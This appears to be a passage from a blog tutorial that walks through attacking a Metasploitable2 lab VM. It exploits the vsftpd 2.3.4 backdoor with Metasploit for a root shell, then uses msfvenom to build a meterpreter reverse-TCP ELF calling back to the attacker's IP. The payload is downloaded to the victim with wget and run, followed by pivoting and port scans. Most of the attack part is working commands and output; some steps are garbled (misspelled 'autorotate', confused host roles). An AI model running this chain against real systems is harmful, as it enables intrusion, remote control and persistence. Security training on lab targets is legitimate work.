    8180/tcp open  unknown
    | http-cookie-flags: 
    |   /admin/: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/jscript/upload.html: 
    |     JSESSIONID: 
    |_      httponly flag not set
    | http-enum: 
    |   /admin/: Possible admin folder
    |   /admin/index.html: Possible admin folder
    |   /admin/login.html: Possible admin folder
    |   /admin/admin.html: Possible admin folder
    |   /admin/account.html: Possible admin folder
    |   /admin/admin_login.html: Possible admin folder
    |   /admin/home.html: Possible admin folder
    |   /admin/admin-login.html: Possible admin folder
    |   /admin/adminLogin.html: Possible admin folder
    |   /admin/controlpanel.html: Possible admin folder
    |   /admin/cp.html: Possible admin folder
    |   /admin/index.jsp: Possible admin folder
    |   /admin/login.jsp: Possible admin folder
    |   /admin/admin.jsp: Possible admin folder
    |   /admin/home.jsp: Possible admin folder
    |   /admin/controlpanel.jsp: Possible admin folder
    |   /admin/admin-login.jsp: Possible admin folder
    |   /admin/cp.jsp: Possible admin folder
    |   /admin/account.jsp: Possible admin folder
    |   /admin/admin_login.jsp: Possible admin folder
    |   /admin/adminLogin.jsp: Possible admin folder
    |   /manager/html/upload: Apache Tomcat (401 Unauthorized)
    |   /manager/html: Apache Tomcat (401 Unauthorized)
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
    |   /admin/jscript/upload.html: Lizard Cart/Remote File upload
    |_  /webdav/: Potentially interesting folder
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    

    The above output shows the list of vulnerabilities and they are as follows:

    actually with the below output result and we will do vulnerability analysis via FTP (vsftpd service)



    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |_sslv2-drown: 
    
    
    



    The attack Procedure


    we can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

    The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in opening the backdoor on port 6200 of the system.



    Let's Exploiting


    The following result of the vulnerabole sourece code will make things much clearer:



    -    else if((p_str->p_buf[i]==0x3a)
    -    && (p_str->p_buf[i+1]==0x29))
    -    {
    -      vsf_sysutil_extra();
    -    }
       }
    



     

    We can clearly see that if the bytes in the network buffer match the backdoor sequence of 0x3a (colon) and 0x29, the malicious function is triggered. 

    Furthermore, is we explore the details of the malicious function, we can see the following function definition for the malicious function:




    Click Here For More Info - https://pastebin.com/AetT9sS5




    sa.sin_port=6200 serves as the backdoor port and all the commands sent to the service get executed using the execl("/bin/sh","sh",(char *)0); function.



    Vulnerability analysis of VSFTPD 2.3.4 backdoor


    After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info command as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q                                                                                                       
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > search vsftpd
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
    
    msf6 > 
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    [*] Using configured payload cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 
    
           Name: VSFTPD v2.3.4 Backdoor Command Execution
         Module: exploit/unix/ftp/vsftpd_234_backdoor
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-07-03
    
    Provided by:
      hdm 
      MC 
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
      RPORT   21               yes       The target port (TCP)
    
    Payload information:
      Space: 2000
      Avoid: 0 characters
    
    Description:
      This module exploits a malicious backdoor that was added to the 
      VSFTPD download archive. This backdoor was introduced into the 
      vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
      according to the most recent information available. This backdoor 
      was removed on July 3rd 2011.
    
    References:
      OSVDB (73573)
      http://pastebin.com/AetT9sS5
      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    




    Now we are going to add RHOST, RPORT, show payload, use payload and check about these options & finally we will exploit...

    We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    



    And as you can after exploiting we can do many things but one thing is that one problem here and problem is how to maintain accessability with these exploitation because after exit from the exploitation then it will destroy the session and after that we have to exploit again to get access or run the command



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    
    ls
    bin
    boot
    cdrom
    dev
    etc
    home
    initrd
    initrd.img
    lib
    lost+found
    media
    mnt
    nohup.out
    opt
    proc
    root
    sbin
    srv
    sys
    tmp
    usr
    var
    vmlinuz
    
    ls -la
    total 125
    drwxr-xr-x  21 root root  4096 May 20  2012 .
    drwxr-xr-x  21 root root  4096 May 20  2012 ..
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
    drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
    lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
    drwxr-xr-x  13 root root  4096 May 13  2012 lib
    drwx------   2 root root 16384 Mar 16  2010 lost+found
    drwxr-xr-x   4 root root  4096 Mar 16  2010 media
    drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
    -rw-------   1 root root 41871 Jul  9 13:49 nohup.out
    drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
    dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
    drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
    drwxr-xr-x   2 root root  4096 May 13  2012 sbin
    drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
    drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
    drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
    drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
    drwxr-xr-x  14 root root  4096 Mar 17  2010 var
    lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
    
    



    Post Exploitation

    After gaining knowledge about this vulnerability and gaining access, let us now exploit once again because we want to access of this vuln to maintain and undercover control in ownself. Let us now exploit the target system. Let us see what options we need to set before firing the exploit onto the target. we can do this by running the show options command, as shown following..




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    
    




    We can see that we have only two options, which are RHOST and RPORT, we set RHOST as the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.


    Next we can check for the matching payloads via the show payloads command to see what payloads are suitable for this particular exploit module.we can see only a single payload which is payload/cmd/unix/interact. We can use this payload using the set payload cmd/unix/interact command.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    



    Vola!! we got it we goot root access to the target system. So, what's next? Since wehave got a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.


    In order to maintain the access and meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. so, lets get started....

     

    sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

    This is own IP 192.168.43.152...




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
    [sudo] password for hackerboy: 
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 123 bytes
    Final size of elf file: 207 bytes
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls                             
    backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    



    We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number that backdoor.elf file will connect to in order to provide us meterpreter access to the target. The -f switch defines the ourput type, and elf is the default extension for the linux-based systems.

     

    But what happend next, shall we go to our victim's system and do post-exploitation? No, nothing like this is going to happen, we will maintain access to materpreter shell through exploit and if you say, with the help of apache server on our system, we will upload the shell to the victim's system.

     

    If your Victim is on another network means away from you, then we can buy and host a server for this and then upload it onto the target machine.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo service apache2 start                                                                              
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo mv backdoor.elf /var/www/html/                                                                                      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    We run the apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


    whoami
    root
    pwd
    /
    
    
    wget http://192.168.43.152/backdoor.elf       
    --16:06:29--  http://192.168.43.152/backdoor.elf
               => `backdoor.elf'
    Connecting to 192.168.43.152:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    
        0K                                                       100%    7.65 MB/s
    
    16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]
    
    
    


    We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.



    OR (2nd method to upload a backdoor file in our victim machine)

     

    We can upload a backdoor in our victim's machine by python's http.server..like this


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
    └─$ python3 -m http.server 1234                                                                                                   1 ⨯
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
     
     

     

    and after then, in out victim's machine , we get a backdoor file via wget  command :-



    whoami
    root
    pwd
    /
    
    wget http://127.0.0.1/backdoor.elf
    
    --2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
    Connecting to 127.0.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    Saving to: ‘backdoor.elf’
    
    backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      
    
    2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]
    
    




    We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > use exploit/multi/handler
    [*] Using configured payload linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/handler) > set LHOST 192.168.43.152
    LHOST => 192.168.43.152
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler...
    
    
    
    

    When we download the file onto the target, we provide appropriate permissions to the file via the chmod command, as shown in the following screenshot:



    chmod 777 backdoor.elf
    
    
    
    
    ls -la
    total 129
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
    -rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
    drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    ....
    
    
    ./backdoor.elf 
    
    


    Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:



    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    [*] Sending stage (984904 bytes) to 192.168.43.120
    [*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530
    
    meterpreter > 
    
    



    Mumma, we got it, we got the meterpreter shell acces to the target. Lets find some interesting information using the post exploitation modules:




    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > 
    meterpreter > ifconfig
    
    



    Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.



    meterpreter > 
    meterpreter > ifconfig
    
    Interface  1
    ============
    Name         : lo
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 16436
    Flags        : UP,LOOPBACK
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
    
    
    Interface  2
    ============
    Name         : eth0
    Hardware MAC : 08:00:27:67:67:30
    MTU          : 1500
    Flags        : UP,BROADCAST,MULTICAST
    IPv4 Address : 192.168.43.120
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    IPv6 Address : fe80::a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    
    meterpreter > 
    



    Running the ifconfig command on the target, we see pretty interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems may reside. We run the arp command on the target and check if there are some systems already connected or were connected to the exploited system from the internal network, as shown in the following screenshot:



    meterpreter > arp
    
    ARP cache
    =========
    
        IP address      MAC address        Interface
        ----------      -----------        ---------
        192.168.43.152  fc:01:7c:29:00:77
    
    meterpreter > 
    
    
    
    

    We can clearly see an additional system with IP address 192.168.43.120 on the internal network. Approaching the internal network, we need to set up pivoting on the exploited machine using the autoroute command.



    meterpreter > run autoroute -p
    
    [*] No routes have been added yet 
    meterpreter > 
    
    
    
    meterpreter > run autorotate -s 192.168.43.120 255.255.255.0
    
    [*] Adding a route to 192.168.43.120/255.255.255.0...
    [+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
    [*] Use the -p option to list all active routes
    
    meterpreter > run autorotate -p
    
    Active Routing Table
    ====================
    
       Subnet            Netmask         Gateway
       ------            -------         -------
       192.168.43.120    255.255.255.0   Session 1 
    
    meterpreter > 
    
    
    


    The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.

    Let us now put the meterpreter session in the background by using the background command as follows:



    meterpreter > background 
    [*] Backgrounding session 1...
    msf6 exploit(multi/handler) > hosts
    
    Hosts
    =====
    
    address          mac                 name      os_name      os_flavor     os_sp     purpose     info
    comments 
    -------          ---                 ----      ------        -----       ----       -----      ----
     ------
    192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                          Server
     
    
    
    msf6 exploit(multi/handler) > 
    




    Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:



    msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > show options
    
    Module options (auxiliary/scanner/portscan/tcp):
    
       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       CONCURRENCY  10               yes       The number of concurrent ports to check per host
       DELAY        0                yes       The delay between connections, per thread, in milliseconds
       JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       THREADS      1                yes       The number of concurrent threads (max one per host)
       TIMEOUT      1000             yes       The socket connect timeout in milliseconds
    
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
    RHOSTS => 192.168.43.0
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
    [*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    
    
    


    Running the port scan module will require us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and again.

    In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
    msf6 auxiliary(scanner/http/http_version) > show options
    
    Module options (auxiliary/scanner/http/http_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    80               yes       The target port (TCP)
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       THREADS  1                yes       The number of concurrent threads (max one per host)
       VHOST                     no        HTTP server virtual host
    
    msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/http/http_version) > run
    
    [+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/http_version) > 
    
    
    


    Running the auxiliary module, we find that the service running on port 80 is the popular Apache 2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can allow an attacker to gain access over the target system.


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.